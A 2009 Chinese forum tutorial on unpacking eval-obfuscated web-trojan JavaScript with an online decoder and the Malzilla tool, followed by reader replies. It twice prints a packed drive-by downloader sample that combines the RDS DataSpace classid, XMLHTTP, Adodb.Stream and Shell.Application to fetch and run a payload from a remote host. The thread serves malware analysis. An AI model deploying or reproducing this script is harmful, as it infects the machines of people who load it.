12   1  /  2  页   跳转

浅谈eval解密之——工具篇

浅谈eval解密之——工具篇

卡卡讲堂之网马解密 初级篇
卡卡讲堂之网马解密 中级篇
卡卡讲堂之网马解密 高级篇(swf网马解密)
卡卡讲堂之网马解密 高级篇(pdf网马解密)
1.Freshow解密工具的详细用法
2.网马解密之——Eval篇
3.网马解密之——Document.write篇
4.网马解密之——Alpha2篇
5.网马解密之——Shellcode篇
6.网马解密之——Base64篇
7.网马解密之——US-ASCII篇
8.浅谈eval解密之——工具篇




引用:
在前期讲解的eval这种加密形式,我们利用alert这个函数来对其进行解密,这种方法是有些弊端,就是在解密的过程中很繁琐,且如果eval加密的代码很长,会出现在弹出时浏览器长时间不响应或弹出代码不完整的情况。那么是否有工具来有效解决这个问题呢,答案是毋庸置疑的,下面我们就讲解如何利用工具来快速对eval加密进行解密。


 

引用:
在这里我们提供两个工具一个是glacierlk大牛的在线解密(在这里也是给小g做个宣传哈),还有一个工具就是malzilla(神器),针对这两种工具我们来详细讲解一下,eval加密的另几种解密方法。




引用:
在线解密工具:http://glacierlk.cn/openlab/jm.htm,附件为malzilla(神器),我这里神器是英文版,网上有汉化版,有想使用汉化版的自己百度一下吧 O(∩_∩)O~


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

附件附件:

下载次数:1784
文件类型:application/octet-stream
文件大小:
上传时间:2009-5-20 9:48:12
描述:rar

最后编辑networkedition 最后编辑于 2009-05-21 14:50:40
分享到:
gototop
 

回复:浅谈eval解密之——工具篇

  • 利用在线解密工具进行eval解密,在这里我们还是使用前期讲解的eval加密源代码:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))


最后编辑networkedition 最后编辑于 2009-05-20 09:55:49
gototop
 

回复:浅谈eval解密之——工具篇

将上述代码粘贴至在线解密的操作区(临时想了一个名称),详见下图:


 

点击右边eval解密按钮完成解密:


最后编辑networkedition 最后编辑于 2009-05-20 10:02:49
gototop
 

回复:浅谈eval解密之——工具篇

解密结果见下图:




我们看到这种解密方法是很快速实用,只需轻点按钮即可完成解密。在这里再次感谢一下glacierlk大牛,提供这么好的在线解密工具。在后续网马解密教程中,我们也会结合这个在线解密工具来进行讲解。
最后编辑networkedition 最后编辑于 2009-05-20 10:11:30
gototop
 

回复:浅谈eval解密之——工具篇

2.  使用malzilla(神器)进行eval解密,在这里代码仍就使用前期讲解代码:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))


最后编辑networkedition 最后编辑于 2009-05-20 10:21:27
gototop
 

回复:浅谈eval解密之——工具篇

我们将上述代码粘贴至神器的decode操作区,详见截图:


最后编辑networkedition 最后编辑于 2009-05-20 10:25:06
gototop
 

回复:浅谈eval解密之——工具篇

接下来我们点击一下run script 按钮来执行代码,注:在这里的操作类似使用alert这个函数来进行解密一样,解密的过程中不会导致将网马下载并运行起来,而导致系统中招。





  此时会弹出一个确认的对话框,大致内容意思为:此脚本包含eval函数时候替换为evla,点击yes(是),详见截图:


最后编辑networkedition 最后编辑于 2009-05-20 10:34:38
gototop
 

回复:浅谈eval解密之——工具篇

点击是确认后,在下部操作区域会显示解密的结果,详见截图:


本帖被评分 1 次
最后编辑networkedition 最后编辑于 2009-05-20 10:39:02
gototop
 

回复:浅谈eval解密之——工具篇

哇塞 

第一排

第一个

谢谢楼主介绍的工具

请问下

那最后解出来的那么多gameeeeeeesss是什么意思
gototop
 

回复:浅谈eval解密之——工具篇

过来学习!p,a,c,k,e,d这个工具也可以用来解EVAL么?
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT